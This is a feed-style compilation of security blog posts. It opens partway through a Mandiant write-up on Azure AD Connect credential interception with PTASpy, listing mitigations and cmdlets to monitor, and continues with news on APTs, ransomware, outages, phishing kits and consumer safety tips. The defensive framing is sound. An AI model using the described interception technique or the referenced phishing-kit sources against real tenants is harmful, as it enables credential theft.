    • This is the default location of the log file that contains records of all the accounts that were intercepted by the tool. Remember, an attacker may also use this to harvest credentials, so it is important to reset the password for these accounts (Figure 25).


Figure 25: PTASpy.csv log activity

Mitigations

In order for this attack to be successful, an attacker must gain administrative privileges on a server running Azure AD Connect and/or gain global administrator rights within M365. Simple practices such as limiting and properly protecting global administrator accounts as well as properly protecting Tier 0 assets can greatly reduce the risk of an attacker successfully using the AADInternals PowerShell against your organization.

  • Limit or restrict access to Azure AD Connect servers.
    • Any server acting as an identity provider or facilitating identity federation should be treated as a Tier 0 asset.
  • Create separate dedicated global administrator accounts.
    • Global administrators should be cloud-only accounts.
    • These accounts should not retain any licensing.
  • Implement MFA on all accounts: admins, users and services.
    • If a particular account cannot use MFA, apply a conditional access rule that limits its logon to a trusted network. This works particularly well for service accounts.  
  • Establish a roadmap to block legacy authentication.
  • Limit which accounts are synced from on-premises to the cloud.
    • Do not sync privileged or service accounts to the cloud.
  • Use Azure administrative roles.
    • Not everybody or everything needs to be a global admin to administer the environment.
  • Use password hash sync over Pass-through Authentication.
    • Many organizations are reluctant to sync their password to Azure AD. The benefits from this service greatly outweigh the risks. Being able to use global and custom banned passwords lists, for both the cloud and on-premises, is a tremendous benefit.
  • Forward all M365 unified audit logs and Azure logs to a SIEM and build detections.
    • Ensure you are forwarding the logs recommended in this post and building the appropriate detections and playbooks within your security operations teams.
    • Specifically monitor for:
      • Set-AcceptedDomain
      • Set-MsolDomainFederationSettings
      • Add-FederatedDomain
      • New-Accepted Domain
      • Remove-Accepted Domain
      • Remove-FederatedDomain
  • Periodically review all identity providers and custom domains configured in the M365 tenant.
    • If an attacker is successful at gaining global administrative privileges, they may choose to add their own identity provider and custom domain to maintain persistence.

Acknowledgements

I want to give a special thanks to Daniel Taylor, Roberto Bamberger and Jennifer Kendall at Microsoft for collaborating with Mandiant on the creation of this blog post.

Researchers Uncover Cyber Espionage Operation Aimed At Indian Army

Cybersecurity researchers uncovered fresh evidence of an ongoing cyberespionage campaign against Indian defense units and armed forces personnel at least since 2019 with an aim to steal sensitive information. Dubbed "Operation SideCopy" by Indian cybersecurity firm Quick Heal, the attacks have been attributed to an advanced persistent threat (APT) group that has successfully managed to stay

Chinese APT Group Targets Media, Finance, and Electronics Sectors

Cybersecurity researchers on Tuesday uncovered a new espionage campaign targeting media, construction, engineering, electronics, and finance sectors in Japan, Taiwan, the U.S., and China. Linking the attacks to Palmerworm (aka BlackTech) — likely a China-based advanced persistent threat (APT) — Symantec's Threat Hunter Team said the first wave of activity associated with this campaign began last

The Value of the PCI Secure Software Lifecycle Standard for Software Vendors


The PCI Secure Software Lifecycle (Secure SLC) Standard is part of the PCI Software Security Framework, which addresses security for software operating in payment environments. In this blog, we interview PCI Security Standards Council’s VP, Global Head of Programs, Gill Woodcock, about the Secure SLC Standard, what it is, and the value of adoption.

Identity Fraud: How to Protect Your Identity Data, Accounts and Money During the Coronavirus Crisis

We’ve all been spending more of our time online since the crisis hit. Whether it’s ordering food for delivery, livestreaming concerts, holding virtual parties, or engaging in a little retail therapy, the digital interactions of many Americans are on the rise. This means we’re also sharing more of our personal and financial information online, with each other and the organizations we interact with. Unfortunately, as ever, there are bad guys around every digital corner looking for a piece of the action.

The bottom line is that personally identifiable information (PII) is the currency of internet crime. And cyber-criminals will do whatever they can to get their hands on it. When they commit identity theft with this data, it can be a messy business, potentially taking months for banks and businesses to investigate before you get your money and credit rating back. At a time of extreme financial hardship, this is the last thing anyone needs.

It therefore pays to be careful about how you use your data and how you protect it. Even more: it’s time to get proactive and monitor it—to try and spot early on if it has been stolen. Here’s what you need to know to protect your identity data.

How identity theft works

First, some data on the scope of the problem. In the second quarter of 2020 alone 349,641 identity theft reports were filed with the FTC. To put that in perspective, it’s over half of the number for the whole of 2019 (650,572), when consumers reported losing more than $1.9 billion to fraud. What’s driving this huge industry? A cybercrime economy estimated to be worth as much as $1.5 trillion annually.

Specialized online marketplaces and private forums provide a user-friendly way for cyber-criminals and fraudsters to easily buy and sell stolen identity data. Many are on the so-called dark web, which is hidden from search engines and requires a specialized anonymizing browser like Tor to access. However, plenty of this criminal activity also happens in plain sight, on social media sites and messaging platforms. This underground industry is an unstoppable force: as avenues are closed down by law enforcement or criminal in-fighting, other ones appear.

At-risk personal data could be anything from email and account log-ins to medical info, SSNs, card and bank details, insurance details and much more. It all has a value on the cybercrime underground and the price fraudsters are prepared to pay will depend on supply and demand, just like in the ‘real’ world.

There are various ways for attackers to get your data. The main ones are:

  • Phishing: usually aimed at stealing your log-ins or tricking you into downloading keylogging or other info-stealing malware. Phishing mainly happens via email but could also occur via web, text, or phone. Around $667m was lost in imposter scams last year, according to the FTC.
  • Malicious mobile apps disguised as legitimate software.
  • Eavesdropping on social media: If you overshare even innocuous personal data (pet names, birth dates, etc.,) it could be used by fraudsters to access your accounts.
  • Public Wi-Fi eavesdropping: If you’re using it, the bad guys may be too.
  • Dumpster diving and shoulder surfing: Sometimes the old ways are still popular.
  • Stealing devices or finding lost/misplaced devices in public places.
  • Attacking the organizations you interact with: Unfortunately this is out of your control somewhat, but it’s no less serious. There were 1,473 reported corporate breaches in 2019, up 17% year-on-year.
  • Harvesting card details covertly from the sites you shop with. Incidents involving this kind of “web skimming” increased 26% in March as more users flocked to e-commerce sites during lockdown.

 

The COVID-19 challenge

As if this weren’t enough, consumers are especially exposed to risk during the current pandemic. Hackers are using the COVID-19 threat as a lure to infect your PC or steal identity data via the phishing tactics described above. They often impersonate trustworthy institutions/officials and emails may claim to include new information on outbreaks, or vaccines. Clicking through or divulging your personal info will land you in trouble. Other fraud attempts will try to sell counterfeit or non-existent medical or other products to help combat infection, harvesting your card details in the process. In March, Interpol seized 34,000 counterfeit COVID goods like surgical masks and $14m worth of potentially dangerous pharmaceuticals.

Phone-based attacks are also on the rise, especially those impersonating government officials. The aim here is to steal your identity data and apply for government emergency stimulus funds in your name. Of the 349,641 identity theft reports filed with the FTC in Q2 2020, 77,684 were specific to government documents or benefits fraud.

What do cybercriminals do with my identity data?

Once your PII is stolen, it’s typically sold on the dark web to those who use it for malicious purposes. It could be used to:

  • Crack open other accounts that share the same log-ins (via credential stuffing). There were 30 billion such attempts in 2018.
  • Log-in to your online bank accounts to drain it of funds.
  • Open bank accounts/credit lines in your name (this can affect your credit rating).
  • Order phones in your name or port your SIM to a new device (this impacts 7,000 Verizon customers per month).
  • Purchase expensive items in your name, such as a new watch or television, for criminal resale. This is often done by hijacking your online accounts with e-tailers. E-commerce fraud is said to be worth around $12 billion per year.
  • File fraudulent tax returns to collect refunds on your behalf.
  • Claim medical care using your insurance details.
  • Potentially crack work accounts to attack your employer.

How do I protect my identity online?

The good news among all this bad is that if you remain skeptical about what you see online, are cautious about what you share, and follow some other simple rules, you’ll stand a greater chance of keeping your PII under lock and key. Best practices include:

  • Using strong, long and unique passwords for all accounts, managed with a password manager.
  • Enable two-factor authentication (2FA) if possible on all accounts.
  • Don’t overshare on social media.
  • Freeze credit immediately if you suspect data has been misused.
  • Remember that if something looks too good to be true online it usually is.
  • Don’t use public Wi-Fi when out-and-about, especially not for sensitive log-ins, without a VPN.
  • Change your password immediately if a provider tells you your data may have been breached.
  • Only visit/enter payment details into HTTPS sites.
  • Don’t click on links or open attachments in unsolicited emails.
  • Only download apps from official app stores.
  • Invest in AV from a reputable vendor for all your desktop and mobile devices.
  • Ensure all operating systems and applications are on the latest version (i.e., patch frequently).
  • Keep an eye on your bank account/credit card for any unusual spending activity.
  • Consider investing in a service to monitor the dark web for your personal data.

How Trend Micro can help

Trend Micro offers solutions that can help to protect your digital identity.

Trend Micro ID Security is the best way to get proactive about data protection. It works 24/7 to monitor dark web sites for your PII and will sound the alarm immediately if it finds any sign your accounts or personal data have been stolen. It features

  • Dark Web Personal Data Manager to scour underground sites and alert if it finds personal info like bank account numbers, driver’s license numbers, SSNs and passport information.
  • Credit Card Checker will do the same as the above but for your credit card information.
  • Email Checker will alert you if any email accounts have been compromised and end up for sale on the dark web, allowing you to immediately change the password.
  • Password Checker will tell you if any passwords you’re using have appeared for sale on the dark web, enabling you to improve password security.

Trend Micro Password Manager enables you to manage all your website and app log-ins from one secure location. Because Password Manager remembers and recalls your credentials on-demand, you can create long, strong and unique passwords for each account. As you’re not sharing easy-to-remember passwords across multiple accounts, you’ll be protected from popular credential stuffing and similar attacks.

Finally, Trend Micro WiFi Protection will protect you if you’re out and about connecting to WiFi hotspots. It automatically detects when a WiFi connection isn’t secure and enables a VPN—making your connection safer and helping keep your identity data private.

In short, it’s time to take an active part in protecting your personal identity data—as if your digital life depended on it. In large part, it does.

 

The post Identity Fraud: How to Protect Your Identity Data, Accounts and Money During the Coronavirus Crisis appeared first on .

Will hospitals wake up to the threat of cyber crime after patient dies during a ransomware attack?

A patient at Dusseldorf University Hospital died during a ransomware infection in what is reportedly the first death directly linked to a cyber attack.

The hospital was unable to accept emergency patients because of the attack, so the woman – who needed urgent treatment for a life-threatening illness – was sent to another hospital 20 miles away, the Associated Press reported.

German prosecutors have since opened a homicide investigation into the incident, while the country’s cyber security agency, the Federal Office for Information Security, was recruited to get the hospital fully operational again.

Bad luck or a ticking timebomb?

An already tragic story was made more so with a report from the German news outlet RTL, which claimed that the cyber attack wasn’t intended for the hospital.

The ransom note was addressed to a nearby university, which suggests that the attackers weren’t aware that they had infected one of the largest hospitals in western Germany.

The criminals stopped their attack when they learned that it had shut down the hospital, but by then the damage had been done.

Although it might be easy to chalk this up as unfortunate, you could just as easily say that it was only a matter of time until something like this happened.

Arne Schönbohm, president of the Federal Office for Information Security, confirmed that the attack exploited a vulnerability in a Citrix VPN system, which the hospital had been aware of since December 2019.

“I can only urge you not to ignore or postpone such warnings but to take appropriate action immediately,” said Schönbohm. “This incident shows once again how seriously this danger must be taken.”

Same old story

The healthcare sector has been a lucrative target for cyber criminals for years, due to its apparent unwillingness to commit to better defences and, in particular, its widespread use of legacy systems.

The UK saw the damage that can occur when relying on legacy systems with the WannaCry attack in 2017.

Most NHS facilities were still using Windows XP, which Microsoft had stopped supporting in 2014 – and it was a vulnerability with that system that exposed 80 NHS trusts and led to £92 million in damages.

Plenty of think pieces were written at the time about how hospitals needed to do a better job of preventing attacks, because future attacks might result in deaths.

Yet, as of last year, more than 2,300 NHS PCs were still running on Windows XP, despite the government signing a £150 million deal with Microsoft to update its devices to Windows 10.

Given the spate of attacks on hospitals during the coronavirus pandemic – both in the UK and the rest of the world – you would have thought it was only a matter of time before we were no longer talking about just the financial and logistical issues caused by cyber attacks, but the human cost.

Hopefully this incident will be a wake-up call for hospitals, which desperately need to prioritise security strategies and realise that cyber attacks can be just as damaging as physical assaults.

The Weekly Round-up: subscribe now

The post Will hospitals wake up to the threat of cyber crime after patient dies during a ransomware attack? appeared first on IT Governance UK Blog.

Who’s Behind Monday’s 14-State 911 Outage?

Emergency 911 systems were down for more than an hour on Monday in towns and cities across 14 U.S. states. The outages led many news outlets to speculate the problem was related to Microsoft‘s Azure web services platform, which also was struggling with a widespread outage at the time. However, multiple sources tell KrebsOnSecurity the 911 issues stemmed from some kind of technical snafu involving Intrado and Lumen, two companies that together handle 911 calls for a broad swath of the United States.

Image: West.com

On the afternoon of Monday, Sept. 28, several states including Arizona, California, Colorado, Delaware, Florida, Illinois, Indiana, Minnesota, Nevada, North Carolina, North Dakota, Ohio, Pennsylvania and Washington reported 911 outages in various cities and localities.

Multiple news reports suggested the outages might have been related to an ongoing service disruption at Microsoft. But a spokesperson for the software giant told KrebsOnSecurity, “we’ve seen no indication that the multi-state 911 outage was a result of yesterday’s Azure service disruption.”

Inquiries made with emergency dispatch centers at several of the towns and cities hit by the 911 outage pointed to a different source: Omaha, Neb.-based Intrado — until last year known as West Safety Communications — a provider of 911 and emergency communications infrastructure, systems and services to telecommunications companies and public safety agencies throughout the country.

Intrado did not respond to multiple requests for comment. But according to officials in Henderson County, NC, which experienced its own 911 failures yesterday, Intrado said the outage was the result of a problem with an unspecified service provider.

“On September 28, 2020, at 4:30pm MT, our 911 Service Provider observed conditions internal to their network that resulted in impacts to 911 call delivery,” reads a statement Intrado provided to county officials. “The impact was mitigated, and service was restored and confirmed to be functional by 5:47PM MT.  Our service provider is currently working to determine root cause.”

The service provider referenced in Intrado’s statement appears to be Lumen, a communications firm and 911 provider that until very recently was known as CenturyLink Inc. A look at the company’s status page indicates multiple Lumen systems experienced total or partial service disruptions on Monday, including its private and internal cloud networks and its control systems network.

Lumen’s status page indicates the company’s private and internal cloud and control system networks had outages or service disruptions on Monday.

In a statement provided to KrebsOnSecurity, Lumen blamed the issue on Intrado.

“At approximately 4:30 p.m. MT, some Lumen customers were affected by a vendor partner event that impacted 911 services in AZ, CO, NC, ND, MN, SD, and UT,” the statement reads. “Service was restored in less than an hour and all 911 traffic is routing properly at this time. The vendor partner is in the process of investigating the event.”

It may be no accident that both of these companies are now operating under new names, as this would hardly be the first time a problem between the two of them has disrupted 911 access for a large number of Americans.

In 2019, Intrado/West and CenturyLink agreed to pay $575,000 to settle an investigation by the Federal Communications Commission (FCC) into an Aug. 2018 outage that lasted 65 minutes. The FCC found that incident was the result of a West Safety technician bungling a configuration change to the company’s 911 routing network.

On April 6, 2014, some 11 million people across the United States were disconnected from 911 services for eight hours thanks to an “entirely preventable” software error tied to Intrado’s systems. The incident affected 81 call dispatch centers, rendering emergency services inoperable in all of Washington and parts of North Carolina, South Carolina, Pennsylvania, California, Minnesota and Florida.

According to a 2014 Washington Post story about a subsequent investigation and report released by the FCC, that issue involved a problem with the way Intrado’s automated system assigns a unique identifying code to each incoming call before passing it on to the appropriate “public safety answering point,” or PSAP.

“On April 9, the software responsible for assigning the codes maxed out at a pre-set limit,” The Post explained. “The counter literally stopped counting at 40 million calls. As a result, the routing system stopped accepting new calls, leading to a bottleneck and a series of cascading failures elsewhere in the 911 infrastructure.”

Compounding the length of the 2014 outage, the FCC found, was that the Intrado server responsible for categorizing and keeping track of service interruptions classified them as “low level” incidents that were never flagged for manual review by human beings.

The FCC ultimately fined Intrado and CenturyLink $17.4 million for the multi-state 2014 outage. An FCC spokesperson declined to comment on Monday’s outage, but said the agency was investigating the incident.

Attack in Autumn 2020: Profile of a 0-Day

As Attack in Autumn 2020 wraps up, the Security Innovation team would like to thank everyone who has helped build a community of Cyber Rangers. Since our first Hack Through the Holidays event in 2018, we’ve seen participants of all backgrounds and skill levels expand their talents with our CMD+CTRL Cyber Ranges. To help even more people learn, we’re forgoing the same old event recap blog and sharing something a bit more interesting. We hope you enjoy it!

Cyber News Rundown: LokiBot Attacks Increase

Reading Time: ~ 2 min.

DHS Announces Massive Increase in LokiBot Attacks

By monitoring and tracking of cyberattacks over 2020, U.S. Department of Homeland Security (DHS) officials have uncovered a significant increase in cyberattacks being carried out by LokiBot, a malicious info-stealer of stored passwords and cryptocurrency information. The increase in LokiBot attacks can likely be attributed to its ability to steal credentials from hundreds of applications, and its range of other features that make it appealing to a wide variety of cyber criminals.

Long Island Hospital Suffers Data Breach

Blackbaud, a third-party vendor for a Long Island hospital, may have exposed sensitive patient information after it suffered a data breach this summer. In a July statement, Blackbaud revealed personally identifiable information for a number of patients was stolen but claimed it was destroyed shortly afterwards. Affected patients have been contacted regarding the breach and stolen information.

Thousands of Customers Exposed in Town Sports Breach

A database containing highly sensitive information belonging to over 600,000 customers and employees of Town Sports International was found publicly exposed on the internet. Town Sports recently filed for bankruptcy and was notified of this breach roughly a week later. While the company did not publically respond to the findings, the information secured the following day included everything from physical addresses to payment card info and other billing data. Past clients of the fitness chain should be wary of any emails they receive regarding their Town Sports memberships.

Global Operation Takes Down Major Dark Web Drug Network

In a major collaboration between Europol and other global intelligence organizations, 179 individuals across six countries have been arrested in relation to drug trafficking through Dark Web markets. Officials also revealed that this bust allowed them to seize $6.5 million in cash and hundreds of kilograms of illicit drugs. The operation is another setback for anonymous marketplaces allowing for the buying and selling of illegal goods and services as law enforcement continues to target rogue online bazaars.

Data from Over 200 Merchants Leaked in Shopify Breach

Data from at least 200 merchants was compromised after an internal support employee for Shopify was found to be stealing data. While the data included only basic contact information on customers and no payment card or social security info was taken, officials for Shopify are still working to determine the extent of the theft and if it has further changed hands. The employees involved with this breach have since been fired and all access to Shopify systems has been revoked to prevent further incident.

The post Cyber News Rundown: LokiBot Attacks Increase appeared first on Webroot Blog.

LIVE Webinar on Zerologon Vulnerability: Technical Analysis and Detection

I am sure that many of you have by now heard of a recently disclosed critical Windows server vulnerability—called Zerologon—that could let hackers completely take over enterprise networks. For those unaware, in brief, all supported versions of the Windows Server operating systems are vulnerable to a critical privilege escalation bug that resides in the Netlogon Remote Control Protocol for Domain

Exploiting MFA Inconsistencies on Microsoft Services

Beau Bullock // Overview On offensive engagements, such as penetration tests and red team assessments, I have been seeing inconsistencies in how MFA is applied to the various Microsoft services. Across Microsoft 365 and Azure, there are multiple endpoints. These endpoints can all be configured under different Conditional Access policy settings, which sometimes lead to […]

The post Exploiting MFA Inconsistencies on Microsoft Services appeared first on Black Hills Information Security.

Answer these questions to find out how safe your social media profiles are

Unless you’re a hermit who lives under a rock, you probably use social media in some form or the other. You’re not alone; recent statistics reveal that you’re among 3.5 billion social media users worldwide. And it’s a rapidly increasing number that already constitutes half the world’s population. Social media…

Tracking PhishingKits for Hunting APT Evolution

Advanced and Persistent Threats are often inoculated by emails or by exploiting exposed vulnerabilities. Since vulnerability exploitation follows specific waves, it depends on vulnerability trends, the email vector become one of the most (ab)used and stable way to inoculate Malicious and unwanted software. A common way to attack victims is to make her open an eMail attachment using common social engineering techniques. For example attackers pretending to be candidate asking to HR manager to open up the “attached curriculum”, or a customer that is asking for special products or information included on a well-crafted Word document, or again attackers pretending to be friends asking for favors, or new customers asking for price lists in a malicious and attached Microsoft Excel, are only some of the (almost) infinite ways to make someone opening an attachment.

But something is slowly changing.

While Phishing was quite underestimated (so far) from Malware analysts working on state sponsored cyber attacks, since Phishing was mostly a used technique to steal credentials by criminal groups, nowadays it is increasingly used from state sponsored attackers to spread Malware (for example Android APP) and to steal credentials to start over a pre-failed attack gaining wider victim surface. Many researcher groups already noticed that slow moving from email attachments to phishing campaign, for example CheckPoint researchers in their great report on Rampant Kitten (rif: HERE) show in section “Infrastructure and Connection” (Figure 9) a nice Phishing infrastructure and the FBI in ME-000134-MW warns about both phishing and eMail attachments as well. But those are only some of many example you can find out there by reading reports and analyses from common researcher groups.

For such a reasons I believe phishing, and mostly important PhishingKits need to be studied and tracked even by cyber security analysts who dedicated their own effort on APT rather on criminality. Just to provide some information about how to track phishingkit I would share some of my tweets on the topic just to show how different they are from each other and how complex they could be.

If you agree with me that PhishingKit would play a nice role in the next few years even in the APT world and if you want to help community to analyze and to report them as quickly as you can, you might decide to start from HERE: a freshly updated repository of PhishingKit. In there you would find more than 600 archives (as today, but every day that number would increase as soon as new PK are detected by my backend system which is running and pushing on git repo) containing source code of many PhishingKits, some of them used in APT, some other used in common credential stealing campaign. You would learn how they evade detection (it’s unbelievable how some criminal implements anti-detection code 😀 ) how they call themselves and how they write codes and how administrator panels look like. If you start a deep analysis on that data you would probably be able to group by author and later on, by clustering on such results, you would be able to wrap and track author style and change over the time. That would be super interesting to track the evolution and to being in control of PK to community to gain a safer digital space.

If you think this work is worth of spreading, please go ahead, and if you use that collections and the scripts in the repository for your research, please cite it using the following BiBText section.

@misc{ MR,
       author = "Marco Ramilli",
       title = "Phishing Kits Tracker",
       year = "2020",
       url = "https://marcoramilli.com/2020/07/13/introducing-phishingkittracker/",
       note = "[Online; July 2020]"
     }

Election 2020 – Five Tips to Secure a Mail-In Ballot That Counts

Elections 2020

Election 2020 – Five Tips to Secure a Mail-In Ballot That Counts

Forecasts predict that roughly 80 million votes will get cast by mail-in ballots—double the number cast by mail in the 2016 election. Here are a couple tips to make sure your vote counts for the 2020 election.

Smart use of the internet will help you cast a mail-in ballot that counts.

Projections abound, yet forecasts predict that roughly 80 million votes will get cast by mail-in ballots—double the number cast by mail in the 2016 election. While we’ll only know the final tally of mail-in voters sometime after election day, what we know right now is that nearly 75% of U.S. voters will be able to vote by mail in the 2020 election

If you’re one of those voters, or know someone who is, this quick five-point primer of online resources should help.

Fake ballots, the pandemic and other election concerns

Pew Research found that Americans are split 50/50 as to whether voting in the 2020 election will be “easy” or “hard.” Compare that to the 2018 figures where 85% said that voting would be “easy” in that election. We can chalk that up to several factors this year, most notably the effect of the pandemic on voting, which I touched on in my blog last week.

However, there are other concerns at play. We’ve seen concerns about mail-in ballot fraud, along with confusion about how to get a mail-in ballot, and yet further confusion as to who is eligible to get a mail-in ballot in the first place… just to name a few.

These concerns all share a common remedy: the facts.

Good information, direct from your state election officials, will point the way. Skip social media altogether. It is not a trusted resource. In all, it’s a mistake to get any election information on social media, according to F.B.I. Director, Christopher Wray. Instead, let’s point ourselves in the right direction.

Cast your mail-in ballot securely with these five tips:

  1. Refer to your state and local officials for guidance: Visiting your state’s election website and resources they offer is your best bet for clearing up any questions about your eligibility to vote by mail or to report any difficulties you may have.
  2. Follow the directions closely: Mail-in ballots, and the rules for filling them out, also vary from state to state. Get to know yours with a visit to your state’s election website. Common errors like failing to get a witness signature (or signatures), failing to slip your ballot into a second security envelope, or using the wrong colored pen are all examples of ways ballots can get disqualified in some states. And when you get your ballot, read it closely before you start—including the mailing or drop off instructions.
  3. Know your election timeline: Deadlines are everything—such as when you can apply for an absentee or mail-in ballot, when they need to be returned or postmarked, and if you have other drop off options other than the mail. Again, your state or local election website will clearly call all that out.
  4. Give the mail extra time: Don’t leave your vote to chance. Request your mail-in ballot, as needed, right away. Once you’ve filled it out, get it in the mail early. The U.S. Postal Service has an entire site dedicated to election mail that’s loaded with plenty of good advice for mail-in voters, whether you’re stateside, overseas, or deployed elsewhere with the military.
  5. Track your ballot: The ability and means to track your ballot will of course vary from state to state. However, checking in with your state’s election website will show you what your options are.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Election 2020 – Five Tips to Secure a Mail-In Ballot That Counts appeared first on McAfee Blogs.

Cybersecurity Awareness Month Helps Us All be #BeCyberSmart

Cybersecurity Awareness Month

Cybersecurity Awareness Month Helps Us All be #BeCyberSmart

October is Cybersecurity Awareness Month, which is led by the National Cyber Security Alliance (NCSA)—a national non-profit focused on cybersecurity education & awareness in conjunction with the U.S. government’s Cybersecurity and Infrastructure Security Agency (CISA). McAfee is pleased to announce that we’re a proud participant.

Cybersecurity Awareness Month

If there’s ever a year to observe Cybersecurity Awareness Month, this is it.

As millions worked, schooled, and simply entertained themselves at home (and continue to do so) this year, internet usage increased by up to 70%. Not surprisingly, cybercriminals followed. Looking at our threat dashboard statistics for the year so far, you’ll see:

  • 113,000+ new malicious websites and URLS referencing COVID-19
  • 5+ Million threats that exploit COVID-19
  • A large spike in trojan-based attacks in April followed by a higher spike in July and August

And that doesn’t account for the millions of other online scams, ransomware, malicious sites, and malware out there in general—of which COVID-19-themed attacks are just a small percentage.

With such a high reliance on the internet right now, 2020 is an excellent year to observe Cybersecurity Awareness Month, along with its focus on what we can do collectively to stay safer together in light of today’s threats.

#BeCyberSmart

Unified under the hashtag #BeCyberSmart, Cybersecurity Awareness Month calls on individuals and organizations alike to take charge of protecting their slice of cyberspace. The aim, above making ourselves safer, is to make everyone safer by having us do our part to make the internet safer for all. In the words of the organizers, “If everyone does their part – implementing stronger security practices, raising community awareness, educating vulnerable audiences or training employees, our interconnected world will be safer and more resilient for everyone.”

Throughout October, we’re participating as well. Here in our blogs and across our broad and ongoing efforts to boost everyone’s awareness and expertise in cybersecurity and simply staying safe online, we’ll be supporting one key theme each week:

Week of October 5: If You Connect It, Protect It

If you’ve kept up with our blogs, this is a theme you’ll know well. The idea behind “If you connect it, protect it” is that the line between our lives online and offline gets blurrier every day. For starters, the average person worldwide spends nearly 7 hours a day online thanks in large part to mobile devices and the time we spend actively connected on our computers. However, we’re also connecting our homes with Internet of Things (IoT) devices—all for an average of 10 connected devices in our homes in the U.S. So even when we don’t have a device in our hand, we’re still connected.

With this increasing number of connections comes an increasing number of opportunities—and challenges. During this weel, we’ll take a look at how internet-connected devices have impacted our lives and how you can take steps that reduce your risk.

Week of October 12 (Week 2): Securing Devices at Home and Work

As we shared at the open of this article, this year saw a major disruption in the way we work, learn, and socialize online. There’s no question that our reliance on the internet, a safe internet, is greater than before. And that calls for a fresh look at the way people and businesses look at security.

This week of Cybersecurity Awareness Month will focus on steps users and organizations can take to protect internet connected devices for both personal and professional use, all in light of a whole new set of potential vulnerabilities that are taking root.

Week of October 19 (Week 3): Securing Internet-Connected Devices in Healthcare

Earlier this year, one of our articles on telemedicine reported that 39% of North Americans and Europeans consulted a doctor or health care provider online for the first time in 2020.   stand as just one example of the many ways that the healthcare industry has embraced connected care. Another noteworthy example comes in the form of internet-connected medical devices, which are found inside care facilities and even worn by patients as they go about their day.

As this trend in medicine has introduced numerous benefits, such as digital health records, patient wellness apps, and more timely care, it’s also exposed the industry to vulnerabilities that cyber criminals regularly attempt to exploit. Here we’ll explore this topic and share what steps both can take do their part and #BeCyberSmart.

Week of October 26 (Week 4): The Future of Connected Devices

The growing trend of homeowners and businesses alike connecting all manner of things across the Internet of Things (IoT) continues. In our homes, we have smart assistants, smart security systems, smart door locks, and numerous other home IoT devices that all need to be protected. Businesses manage their fleets, optimize their supply chain, and run their HVAC systems with IoT devices, which also beg protection too as hackers employ new avenues of attack, such as GPS spoofing. And these are just a fraction of the applications that we can mention as the world races toward a predicted 50 billion IoT devices by 2030.

As part of Cybersecurity Awareness Month, we’ll look at the future of connected devices and how both people and businesses can protect themselves, their operations, and others.

Give yourself a security checkup

As Cybersecurity Awareness Month ramps up, it presents an opportunity for each of us to take a look at our habits and to get a refresher on things we can do right now to keep ourselves, and our internet, a safer place. This brief list should give you a great start, along with a catalog of articles on identity theft, family safety, mobile & IoT security, and our regularly updated consumer threat notices.

Use strong, unique passwords

Given the dozens of accounts you need to protect—from your social media accounts to your financial accounts—coming up with strong passwords can take both time and effort. Rather than keeping them on scraps of paper or in a notebook (and absolutely not on an unprotected file on your computer), consider using a password manager. It acts as a database for all your passwords and stores new codes as you create them. With just a single password, you can access all the tools your password manager offers.

Beware of messages from unknown users

Phishing scams like these are an old standard. If you receive an email or text from an unknown person or party that asks you to download software, share personal information, or take some kind of action, don’t click on anything. This will steer you clear of any scams or malicious content.

However, more sophisticated phishing attacks can look like they’re actually coming from a legitimate organization. Instead of clicking on a link within the email or text, it’s best to go straight to the organization’s website or contact customer service. Also, you can hover over the link and get a link preview. If the URL looks suspicious, delete the message and move on.

Use a VPN and a comprehensive security solution

Avoid hackers infiltrating your network by using a VPN, which allows you to send and receive data while encrypting – or scrambling – your information so others can’t read it. By helping to protect your network, VPNs also prevent hackers from accessing other devices (work or personal) connected to your Wi-Fi.

In addition, use a robust security software like McAfee® Total Protection, which helps to defend your entire family from the latest threats and malware while providing safe web browsing.

Check your credit

At a time where data breaches occur and our identity is at risk of being stolen, checking your credit is a habit to get into. Aside from checking your existing accounts for false charges, checking your credit can spot if a fraudulent account has been opened in your name.

It’s a relatively straightforward process. In the U.S., the Fair Credit Reporting Act (FCRA) requires credit reporting agencies to provide you with a free credit check at least once every 12 months. Get your free credit report here from the U.S. Federal Trade Commission (FTC). Other nations provide similar services, such as the free credit reports for UK customers.

Be aware of the latest threats

To track malicious pandemic-related campaigns, McAfee Advanced Programs Group (APG) has published a COVID-19 Threat Dashboard, which includes top threats leveraging the pandemic, most targeted verticals and countries, and most utilized threat types and volume over time. The dashboard is updated daily at 4pm ET.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Cybersecurity Awareness Month Helps Us All be #BeCyberSmart appeared first on McAfee Blogs.

Give up Google, don’t hit ‘accept all’: how to fight for your privacy

In Privacy Is Power, professor Carissa Véliz has made a shocking survey of how much intimate data we are surrendering. But she has a plan to fight back

“If you’re reading this book, you probably already know your personal data is being collected, stored and analysed,” Carissa Véliz begins, in Privacy Is Power. Her challenge, as a writer and a privacy advocate, is to shake us out of our complacency; to persuade us to see this not as a necessary sacrifice in the digital age, but an intolerable invasion. From the mounting dread I felt while reading Privacy Is Power, I’d say she was successful.

From the moment you wake up and first check your phone, to the marketers that infer your mood from your music choices, to the smart speaker that shares your private conversations, or the television that listens in on them (from the terms and conditions of a Samsung smart TV: “Please be aware that if your spoken words include personal or other sensitive information, that information will be among the data captured”), there is nowhere to hide – or even just be – in this hyper-connected hellscape. Corporations can track you both by your face and your digital footprint, your medical records may be handed over to Big Tech, and advertisers may learn of your break-up before you do. In her book, Véliz, a professor at the Institute for Ethics in AI at Oxford University, often veers into the second person, cleverly underscoring her point: it’s impossible not to picture yourself blindly navigating this horror, then you remember - you already are.

Think twice before sharing. Before you post something, think how it might be used against you.

In Japan last year, a man sexually assaulted a pop star, claiming he had found her by analysing reflections in her eyes in photos she had posted online

Related: Government admits breaking privacy law with NHS test and trace

Privacy Is Power: Why and How You Should Take Back Control of Your Data, by Carissa Véliz is published by Bantam Press. To order a copy, go to guardianbookshop.com.

Continue reading...

Cyber Resilience for Business Continuity

Reading Time: ~ 2 min.

“Ten years ago, you didn’t see state actors attacking [small businesses]. But it’s happening now,” warns George Anderson, product marketing director at Carbonite + Webroot, OpenText companies.

Sadly, many of today’s managed service providers who serve small and medium-sized businesses now have to concern themselves with these very threats. Independent and state-sponsored hacking groups use sophisticated hacking tools (advanced persistent threats or APTs), to gain unauthorized access to networks and computers, often going undetected for months or even years at a time. In fact, according to the 2020 Verizon Data Breach Investigations Report, cyber-espionage is among the top patterns associated with breaches targeting businesses worldwide.

